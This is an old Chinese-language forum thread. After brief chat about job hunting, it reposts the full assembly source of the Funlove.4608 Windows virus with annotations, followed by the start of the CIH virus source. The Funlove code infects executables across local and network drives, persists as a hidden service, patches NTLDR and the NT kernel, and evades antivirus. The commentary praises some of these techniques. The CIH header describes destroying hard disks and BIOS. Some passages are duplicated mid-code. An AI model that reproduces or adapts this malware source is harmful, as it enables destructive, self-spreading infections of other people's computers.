理解,我也是刚找到工作,都没签呢,知道今年找工作的痛苦。 兄弟,我是跳槽啊 更郁闷 :( :( :( |
|
|
|
10楼#
发布于:2002-05-28 22:13
唉。陪你郁闷
|
|
|
|
11楼#
发布于:2002-05-28 22:18
唉。陪你郁闷 不用 我希望大家高兴 |
|
|
|
12楼#
发布于:2002-05-29 10:25
;Funlove.4608源代码
;********************************************************************************************* ; 开始代码 ;********************************************************************************************* VStart: call GetDelta lea esi,[offset HostCode + ebx] mov edi,[esp] sub edi,08 mov [esp],edi movsd movsd push dword ptr [esp + 04] call RelocKernel32 ;重定位Kernel32 or eax,eax jz short Exit cmp byte ptr [offset OS + ebx],00;判断操作系统的类型 jnz short NT_Srv call Create9xProcess ;建立WIN9X进程 ret NT_Srv: call CreateNTService ;建立NT服务 Exit: ret ;********************************************************************************************* ;建立NT服务的子程序 ;********************************************************************************************* CreateNTService: call RelocAdvapi32 or eax,eax jz short CNT_Failed push 02 push 00 push 00 ; 取服务管理器的句柄 call OpenSCManagerA or eax,eax jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable ;建立FLCSS.EXE, or eax,eax ; 已经驻留内存就退出. jz short CNT_Exit mov edi,0F01FF lea esi,offset [Service + ebx] push edi push esi push SCM_Handle call OpenServiceA or eax,eax jnz short CNT_Run xor eax,eax push eax push eax push eax push eax push eax lea eax,[offset Buffer1 + ebx] ; flcss.exe push eax push 01 ;错误代码 push 02 ; 开始 push 20 ; 类型 push edi push 00 push esi push SCM_Handle ;句柄 call CreateServiceA ;建立服务 or eax,eax jz short CNT_Failed CNT_Run: push 00 push 00 push eax call StartServiceA ;开始服务 or eax,eax jnz short CNT_Exit CNT_Failed: call StartInfectionThread ;传染子程序 CNT_Exit: ret ;********************************************************************************************* ;建立WIN9X进程的子程序 ;********************************************************************************************* Create9xProcess: ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. call CreateExecutable or eax,eax jz short P9x_Exit P9x_00: xor eax,eax lea edi,[offset Buffer2 + ebx] push edi push edi mov ecx,040 repz stosd mov cl,06 push eax loop $ - 1 lea esi,[offset Buffer1 + ebx] push esi push 00 call CreateProcessA ;创建进程 or eax,eax jnz short P9x_Exit P9x_Failed: call StartInfectionThread;传染子程序 P9x_Exit: ret **************************************************************************** ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. **************************************************************************** CreateExecutable: lea edi,[offset Buffer1 + ebx] push edi push 104 push edi call GetSystemDirectoryA ;取得系统目录 add edi,eax mov al,\'\\\' stosb lea esi,[offset Process + ebx] movsd movsd movsd push 02 call OpenFile cmp eax,-1 jz short CE_Exit mov c_FileHandle,eax lea edi,[offset VImports + ebx] ;清除 import mov eax,-1 stosd stosd lea edi,[offset Kernel32_Relocated + ebx] ;第二个 import mov eax,[edi - 8] stosd push 00 lea esi,c_BytesWritten push esi push 0200 push ebx push c_FileHandle call WriteFile ; 写文件头 push 00 push esi push 1000 push ebx push c_FileHandle call WriteFile ; 写入病毒主体 push c_FileHandle call CloseHandle ;关闭文件 CE_Exit: inc eax ret ;************************************************************************************ ;以下应该是病毒的服务程序 ;************************************************************************************ VService: call GetDelta push dword ptr [esp] call RelocKernel32 or eax,eax jz VS_Exit cmp byte ptr [offset OS + ebx],00 ;操作系统的类型 jz short W9x_Service_Register ;注册WIN9X服务 WNT_Service_Hacknowledge: call RelocAdvapi32 ;重定位Advapi32 or eax,eax jz VS_Exit lea esi,[offset Buffer1 + ebx] xor eax,eax lea ecx,[offset Service + ebx] lea edx,[offset ServiceDispatcher + ebx] mov [esi],ecx mov [esi + 04],edx mov [esi + 08],eax mov [esi + 0C],eax ; 将控制权返回给调用者 push esi call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[offset USER32_Name + ebx] push esi call LoadLibraryA lea esi,[offset RegisterClassA+ ebx] push esi push eax call GetProcAddress ;取进程的地址 or eax,eax jz short VS_00 mov [esi - 06],eax lea esi,[offset Buffer1 + ebx] mov edi,esi xor eax,eax mov ecx,0A repz stosd mov dword ptr [esi + 04],-1 mov dword ptr [esi + 10],400000 ; WINDOWS9X的基址 lea eax,[offset Service + ebx] mov [esi + 24],eax push esi call RegisterClassA ; 这里非常重要 lea esi,[offset RegisterServiceProcess+ ebx] push esi push dword ptr [offset Kernel32_Base + ebx] call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax call GetCurrentProcessId ;取当前进程的ID ; 注册为服务 call GetCurrentProcessId ;取当前进程的ID ; 注册为服务进程,防止被用户 push 01 ;用CTRL+ALR+DEL从任务管理器中发现 push eax call RegisterServiceProcess push 8000 ; 延时 call Sleep VS_00: call StartInfectionThread VS_Exit: ret ;********************************************************************************************* ;NT服务子程序 ;********************************************************************************************* ServiceDispatcher: call GetDelta lea esi,[offset ServiceHandler + ebx] lea edi,[offset Service + ebx] push esi push edi call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[offset Buffer1 + ebx] mov edi,esi mov ecx,06 xor eax,eax repz stosd mov dword ptr [esi],10 mov dword ptr [esi + 04],04 mov dword ptr [esi + 08],07 push esi push Service_Handle ;告诉WINDOWS服务已经正确的运行 call SetServiceStatus push 8000 call Sleep call StartInfectionThread ;建立进程 ret ServiceHandler: ret ; 当管理员关闭服务时,提示系统出错!好东西!!! ;********************************************************************************************* ;此子程序用于建立线程 ;********************************************************************************************* StartInfectionThread: call GetTickCount mov [offset Rand + ebx],eax lea eax,ThreadId push eax push 0 push 0 lea eax,[offset VThread + ebx] push eax push 0 push 0 call CreateThread ret ;********************************************************************************************* ; 病毒线程 ;********************************************************************************************* VThread: call GetDelta call InfectDrives ;感染本地文件 push 60000 call Sleep call GetRand and al,1F jnz short VThread call InfectNetwork ;感染网络文件 jmp short VThread ;******************************************************************************** ; 通过网络传染的子程序,值得借鉴 ;******************************************************************************** InfectNetwork: lea eax,[offset MPR_Name + ebx] push eax call LoadLibraryA or eax,eax jz short INet_Failed push eax lea esi,[offset MPR_Functions + ebx] push esi call DLL_Relocate or eax,eax jz short INet_Failed push 00 call NetSearch INet_Failed: ret ;********************************************************************************************* ; 此子程序用于测试驱动器是否有效 ;********************************************************************************************* InfectDrives: push esi call GetTickCount mov [offset Tick + ebx],eax lea esi,[offset Buffer1 + ebx] mov dword ptr [esi],\' \\:+ ebx - offset VStart\' ID_TestDrive: mov byte ptr [esi + 03],00 push esi call GetDriveTypeA ;取驱动器类型 cmp al,03 ;硬盘? jz short ID_DriveOk cmp al,04 ;网络驱动器? jnz short ID_Invalid ID_DriveOk: add esi,03 push esi call BlownAway push esi call FileSearch ;查找文件 sub esi,03 ID_Invalid: mov al,[offset Buffer1 + ebx] inc al mov [offset Buffer1 + ebx],al cmp al,\'Z\' jna short ID_TestDrive pop esi ret ;********************************************************************************************* ;查找计算机 ;********************************************************************************************* NetSearch : mov EnumBufferSize,4000 or EnumNB_Objects,-1 lea eax,WNetStructAddr push eax push WNetStructAddr push 0 push 0 push 2 call WNetOpenEnumA or eax,eax jnz NET_Close push 04 push 1000 push 4000 push 00 call VirtualAlloc or eax,eax jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize push eax push esi lea eax,EnumNB_Objects push eax push WNetStructAddr call WNetEnumResourceA or eax,eax jnz short NET_Free mov ecx,EnumNB_Objects or ecx,ecx jz short NET_00 NET_01: push ecx push esi mov esi,[esi + 14] ; 计算机名 or esi,esi jz short NET_03 cmp word ptr [esi],0041 ; 是否为软盘 jz short NET_03 lea edi,[offset Buffer1 + ebx] NET_02: movsb cmp byte ptr [esi],00 jnz short NET_02 mov al,\'\\\' stosb push edi call BlownAway push edi call FileSearch NET_03: pop esi mov eax,[esi + 0C] and al,2 cmp al,2 jnz short NET_04 push esi call NetSearch NET_04: add esi,20 pop ecx loop NET_01 jmp short NET_00 NET_Free: push 8000 push 00 push EnumBufferAddr call VirtualFree NET_Close: push WNetStructAddr call WNetCloseEnum ret ;************************************************************************************* ; 查找文件子程序,这些跟以前DOS下没什么区别, ; ; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽! ^_^ ;************************************************************************************* FileSearch: mov eax,CurrentDirEnd mov dword ptr [eax],002A2E2A ; *.* lea edi,[offset Buffer2 + ebx] lea esi,[offset Buffer1 + ebx] push edi push esi call FindFirstFileA ;找第一个文件 cmp eax,-1 jz short RS_Exit RS_00: mov SearchHandle,eax RS_01: test byte ptr [edi],10 ; 测试是目录还是文件 jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],\'.\' jz short RS_Next mov esi,edi add esi,2C mov edi,CurrentDirEnd RSD_00: movsb cmp byte ptr [esi],0 jnz short RSD_00 mov al,\'\\\' stosb push edi call FileSearch RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHand RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHandle call FindClose RS_Exit: ret ;******************************************************************** ;没什么新意,略过吧 ;******************************************************************** FileTest: mov edx,[edi + 2C] or edx,20202020 xor edx,61F81F61 lea esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染 mov ecx,0C FT_00: lodsd cmp edx,eax jz short FT_Exit loop FT_00 ;************************************************************************ ;注意拉, ;************************************************************************ mov esi,edi add esi,2C FT_01: lodsb or al,al jnz short FT_01 mov eax,[esi - 4] ; 扩展名判断 or eax,20202020 cmp eax,\' xco\' ;控件 jz short FT_02 cmp eax,\' rcs\' ;屏幕保护文件 jz short FT_02 cmp eax,\' exe\' ;标准的EXE文件 jnz short FT_Exit FT_02: mov eax,[edi + 20] ; 文件小于2000的就不感染 cmp eax,2000 jc short FT_Exit cmp al,03 ; 检测是否已经感染 jz short FT_Exit lea esi,[offset Buffer1 + ebx] ; 取文件名和路径 lea edi,[offset Buffer3 + ebx] push edi mov ecx,CurrentDirEnd sub ecx,esi repz movsb lea esi,[offset Buffer2 + ebx] add esi,2C FT_03: movsb cmp byte ptr [esi - 1],0 jnz short FT_03 call InfectFile ;干活了, FT_Exit: jmp RS_Next ;***************************************************************************************** ;感染文件子程序 ;***************************************************************************************** InfectFile: push i_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz IN_Exit mov i_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小,用于以后还原 mov i_FileSize,eax cmp al,03 ; 是否感染 jz IN_Exit lea edi,[offset Buffer3 + ebx] push 00 lea esi,i_BytesRead push esi push 2000 push edi push i_FileHandle call ReadFile ;********************************************************************************* ;以下的程序跟文件头有关,建议没基础者找一些相关资料看看 ;********************************************************************************* cmp word ptr [edi],5A4Dh ;DOS文件头,开始有点印象了吧 jnz IN_CloseFile cmp word ptr [edi + 18],0040 ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件 jnz IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; DOS文件头的大小 ja IN_CloseFile add edi,[edi + 3C] ;指向PE或NE文件头 mov eax,[edi] cmp eax,00004550 ;PE文件吗? jnz IN_CloseFile ;此步必须,因为WIN3.X的18H的值也大于等于40H cmp word ptr [edi + 5C],2 ; GUI???? jnz IN_CloseFile mov esi,edi add esi,18 add si,[edi + 14] ; 将ESI指向第一个节表 push esi mov eax,[edi + 28] ; 查找包含\"PE\"的节表 IN_00: mov ecx,[esi + 0C] add ecx,[esi + 08] cmp eax,ecx jc short IN_01 add esi,28 jmp short IN_00 IN_01: sub eax,[esi + 0C] add eax,[esi + 14] mov i_EP_Offset,eax or [esi + 24],80000000 ; 将它改为可写,这里是WINDOWS跟 ;DOS在程序和数据段上的一个重要改变 ;也是写WINDOWS病毒要注意的地方之一 pop esi xor ecx,ecx mov cx,[edi + 06] dec ecx mov eax,ecx mov edx,28 mul edx add esi,eax ; ESI指向最后一个节表 mov eax,[esi + 24] cmp al,80 ; 是否已经初始化 jz IN_CloseFile or eax,8C000000 ; 将它改为可写, and eax,not 12000000 ; 不共享,不可丢弃 mov [esi + 24],eax mov ecx,i_FileSize ;这里好象跟SFX有点关系 mov edx,ecx mov eax,ecx clc shr eax,03 sub edx,eax sub edx,[esi + 14] jc short IN_02 sub edx,[esi + 10] jnc IN_CloseFile IN_02: ; 重新计算节的长度 mov edx,[esi + 08] sub ecx,[esi + 14] jc short IN_03 cmp edx,ecx ja short IN_03 mov edx,ecx IN_03: test edx,00000FFF jz short IN_04 and edx,0FFFFF000 add edx,1000 IN_04: mov ecx,edx add ecx,[esi + 0C] mov eax,ecx add eax,4000 mov [edi + 50],eax ; 新的长度 sub ecx,[edi + 28] add ecx,offset VStart - 100 - 08 mov i_HostDep32,ecx mov eax,edx add eax,4000 ; 改变虚拟大小 mov [esi + 08],eax mov eax,edx add eax,[esi + 14] mov i_VirusOffset,eax add edx,1000 ; 改变物理大小 mov [esi + 10],edx add edx,[esi + 14] add edx,03 push i_FileHandle push edx call MapFile or eax,eax jz short IN_CloseFile mov i_MapHandle,eax push eax call ViewMap or eax,eax jz short IN_CloseMap mov edx,eax lea esi,[offset Buffer3 + ebx] ; 写PE文件头 mov edi,edx mov ecx,2000 repz movsb lea edi,[offset HostCode + ebx] mov esi,i_EP_Offset add esi,edx movsd movsd mov edi,esi ; 设置CALL GS:Virus sub edi,08 mov eax,00E8659090 stosd mov eax,i_HostDep32 stosd mov edi,edx mov eax,i_FileSize mov ecx,i_VirusOffset sub ecx,eax jna short IN_05 add edi,eax xor al,al repz stosb IN_05: mov esi,ebx ;写入病毒主体 mov edi,edx add edi,i_VirusOffset mov ecx,VSize repz movsb mov ecx,Phys_VSize - VSize + 3 repz stosb push edx call UnmapViewOfFile IN_CloseMap: push i_MapHandle call CloseHandle ;关闭 call Wait_A_Little ;延时 IN_CloseFile: lea esi,[offset Buffer2 + 14 + ebx] ; 恢复文件的时间 push esi sub esi,08 push esi sub esi,08 push esi push i_FileHandle call SetFileTime push i_FileHandle call CloseHandle ;关闭文件 IN_Exit: ret ;******************************************************************************** ; 查找GetProcAddress 的子程序 ;******************************************************************************** Whereis_GPA: lea esi,[offset GPA_Sigs + ebx] mov byte ptr [offset OS + ebx],00 mov eax,w_Kernel32 and eax,0FFF00000 cmp eax,0BFF00000 jnz short OS_WinNT? OS_Win9x: mov edi,0BFF70000 jmp short WG_00 OS_WinNT?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077F00000 jnz short OS_Win2K? mov edi,eax jmp short WG_00 OS_Win2K?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077E00000 jnz short WG_Failed mov edi,077E80000 WG_00: mov edx,edi mov ecx,20000 WG_01: push ecx mov ecx,08 push esi push edi repz cmpsb pop edi pop esi pop ecx jz short WG_02 inc edi loop WG_01 WG_Failed: xor eax,eax jmp short WG_03 WG_02: add edi,03 mov [offset GetProcAddress + 1 + ebx],edi mov eax,edx mov [offset Kernel32_Base + ebx],eax WG_03: ret ;*************************************************************************************** ;DLL 重定位子程序 ;*************************************************************************************** DLL_Relocate: mov esi,DLL_Func DR_00: mov eax,esi add eax,07 push eax push DLL_Base call GetProcAddress or eax,eax jz short DR_03 DR_01: mov [esi + 1],eax add esi,07 DR_02: lodsb or al,al jnz short DR_02 cmp byte ptr [esi],0B8 jz short DR_00 DR_03: ret ;********************************************************************************************** ; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧 ;********************************************************************************************** BlownAway: lea esi,[offset NTLDR + ebx] mov edi,DirEnd movsd movsd lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTLDR + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_00 add esi,10 BA_00: push edi push esi push 05 call PatchFile lea esi,[offset NTOSKRNL + ebx] mov edi,DirEnd BA_01: movsb cmp byte ptr [esi - 1],00 jnz short BA_01 lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTOSKRNL + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_02 add esi,18 BA_02: push edi push esi push 09 call PatchFile ret PatchFile: push p_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz short PA_Exit mov p_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小 mov p_FileSize,eax push p_FileHandle push eax call MapFile or eax,eax jz short PA_CloseFile mov p_MapHandle,eax push eax call ViewMap or eax,eax jz short PA_CloseMap mov edx,eax mov edi,eax mov esi,p_PatchAddr mov ecx,p_FileSize PA_00: push ecx push esi push edi mov ecx,p_PatchSize repz cmpsb pop edi pop esi pop ecx jz short PA_01 inc edi loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize add esi,ecx repz movsb PA_Unmap: push edx call UnmapViewOfFile PA_CloseMap: push p_MapHandle call CloseHandle PA_CloseFile: push p_FileHandle call CloseHandle ;关闭文件 PA_Exit: ret ;********************************************************************************************** ;此子程序用于取病毒在内存中的开始地址,经典技术 ;********************************************************************************************** GetDelta: call delta delta: pop ebx sub ebx,offset delta - VStart ret ;********************************************************************************************** ;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法 ;********************************************************************************************** RelocKernel32: push r_Kernel32 call Whereis_GPA or eax,eax jz short RK_00 push eax lea esi,[offset Kernel32_Functions + ebx] push esi call DLL_Relocate RK_00: ret ;********************************************************************************************** ; 以下是重定位Advapi32的子程序 ;********************************************************************************************** RelocAdvapi32: lea eax,[offset ADVAPI32_Name + ebx] push eax call LoadLibraryA or eax,eax jz short RA_00 push eax lea esi,[offset ADVAPI32_Functions + ebx] push esi call DLL_Relocate RA_00: ret ;********************************************************************************************** ; 打开文件子程序 ;********************************************************************************************** OpenFile: push 20 push o_Filename call SetFileAttributesA push 00 push 80 ; 普通属性 push o_OpenMode push 00 push 00 ; 不共享, push 0C0000000 ; 读写方式 push o_Filename call CreateFileA ret ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileM ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileMappingA ret ViewMap: push 00 push 00 push 00 push 02 push v_MapHandle call MapViewOfFile ret ;********************************************************************************************** ; 延时,没什么说的了 ;********************************************************************************************** Wait_A_Little: call GetTickCount sub eax,[offset Tick + ebx] cmp eax,4000 jc short WAL_00 push 16000 call Sleep call GetTickCount mov [offset Tick + ebx],eax WAL_00: ret GetRand: push ecx push edx mov eax,[offset Rand + ebx] xor edx,edx mov ecx,7FFFFFFF mul ecx inc eax mov ecx,0FFFFFFFBh div ecx mov eax,edx mov [offset Rand + ebx],eax pop edx pop ecx ret ;********************************************************************************************** ;以下是一些数据 ;********************************************************************************************** HostCode db 8 dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2 NT4 db 0C2,04,00,55,8Bh,4C,24,0C W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db \'NTLDR\',0 NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志 db 3Bh,46,58,0EBh,07 W2K_NTLDR db 3Bh,47,58,74,07 db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志 NTOSKRNL db \'WINNT\\System32\\ntoskrnl.exe\',0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志 db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上 db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 ;********************************************************************************************** ;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字, ;********************************************************************************************** SkipNames: dd 139D7300h ; aler dd 0F977200h ; amon dd 118E7E1Eh ; _avp dd 52886900h ; avp3 dd 0C886900h ; avpm dd 13883207h ; f-pr dd 168E7E0Fh ; navw dd 0F997C12h ; scan dd 128B7212h ; smss dd 04907B05h ; ddhe dd 00946F05h ; dpla dd 00946F0Ch ; mpla Process db \'flcss.exe\',0 Service db \'FLC\',0 ; Import节表 VImports: dd offset Kernel32_Pointers dd -1,-1 dd offset Kernel32_Name dd offset Kernel32_Relocated db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep Kernel32_Relocated dd offset Kernel32_Beep Kernel32_Beep db ?,?,\'Beep\',0 ;********************************************************************************************* ; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了, ; ; 注: 绝顶高手--------没有头发的高手 ;********************************************************************************************* Kernel32_Name db \'KERNEL32.dll\',0 Kernel32_Functions: CloseHandle: db 0B8,4 dup(?),0FF,0E0,\'CloseHandle\',0 CreateFileA: db 0B8,4 dup(?),0FF,0E0,\'CreateFileA\',0 CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,\'CreateFileMappingA\',0 CreateProcessA: db 0B8,4 dup(?),0FF,0E0,\'CreateProcessA\',0 CreateThread: db 0B8,4 dup(?),0FF,0E0,\'CreateThread\',0 FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,\'FindFirstFileA\',0 FindNextFileA: db 0B8,4 dup(?),0FF,0E0,\'FindNextFileA\',0 FindClose: db 0B8,4 dup(?),0FF,0E0,\'FindClose\',0 GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,\'GetCurrentProcessId\',0 GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,\'GetDriveTypeA\',0 GetFileSize: db 0B8,4 dup(?),0FF,0E0,\'GetFileSize\',0 GetProcAddress: db 0B8,4 dup(?),0FF,0E0,\'GetProcAddress\',0 GetTickCount: db 0B8,4 dup(?),0FF,0E0,\'GetTickCount\',0 GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,\'GetSystemDirectoryA\',0 LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,\'LoadLibraryA\',0 MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,\'MapViewOfFile\',0 ReadFile: db 0B8,4 dup(?),0FF,0E0,\'ReadFile\',0 SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,\'SetFileAttributesA\',0 SetFileTime: db 0B8,4 dup(?),0FF,0E0,\'SetFileTime\',0 Sleep: db 0B8,4 dup(?),0FF,0E0,\'Sleep\',0 UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,\'UnmapViewOfFile\',0 VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,\'VirtualAlloc\',0 VirtualFree: db 0B8,4 dup(?),0FF,0E0,\'VirtualFree\',0 WriteFile: db 0B8,4 dup(?),0FF,0E0,\'WriteFile\',0 ;注:下面的API在WIN9X中是没有的 db 0 RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,\'RegisterServiceProcess\',0 USER32_Name db \'USER32.dll\',0 RegisterClassA: db 0B8,4 dup(?),0FF,0E0,\'RegisterClassA\',0 ADVAPI32_Name db \'ADVAPI32.dll\',0 ADVAPI32_Functions: OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,\'OpenSCManagerA\',0 OpenServiceA: db 0B8,4 dup(?),0FF,0E0,\'OpenServiceA\',0 CreateServiceA: db 0B8,4 dup(?),0FF,0E0,\'CreateServiceA\',0 StartServiceA: db 0B8,4 dup(?),0FF,0E0,\'StartServiceA\',0 StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,\'StartServiceCtrlDispatcherA\',0 RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,\'RegisterServiceCtrlHandlerA\',0 SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,\'SetServiceStatus\',0 MPR_Name db \'MPR.dll\',0 MPR_Functions: WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,\'WNetOpenEnumA\',0 WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,\'WNetEnumResourceA\',0 WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,\'WNetCloseEnum\',0 ;病毒应该是在这里就结束了 vend: Kernel32_Base dd ? Rand dd ? Tick dd ? OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; 此处应该是用于存放当前目录 Buffer2 db 200 dup (?) Buffer3 db 2000 dup (?) ;此处用于存放读入的文件 CODE ENDS END main |
|
|
13楼#
发布于:2002-05-29 15:10
虽然代码简单但,代码长需要长时间研究
yiyiz兄真有毅力 |
|
|
|
14楼#
发布于:2002-05-29 15:21
虽然代码简单但,代码长需要长时间研究 那只是他转载的,不是他注释的 而且注释的那个人注释的也不详细 |
|
|
|
15楼#
发布于:2002-05-31 19:45
cih原代码
; **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Source : TTIT of TATUNG in Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ;编译连接方法 ; * * ;使用的是TurboAssembler ; *==========================================================================* ;可在Borland C++ 3.1中找到 ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn\'t Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn\'t be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don\'t be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it\'s Size... ^__^ * ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. * ; * 4. The Virus \"Basic\" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus \"Basic\" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don\'t Infect it. * ; * 05/24/1998 2. The Virus \"Basic\" Size is 1010 Bytes. * ; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * ; * 2. Change the Date of Killing Computers. * ; * 05/31/1998 3. Modify Virus Version Copyright. * ; * 4. The Virus \"Basic\" Size is 1019 Bytes. * ; **************************************************************************** .586P ;586保护模式汇编 ; **************************************************************************** ; * Original PE Executable File(Don\'t Modify this Section) * ; **************************************************************************** OriginalAppEXE SEGMENT FileHeader: ;编译连接后的PE格式可执行文件文件头 db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 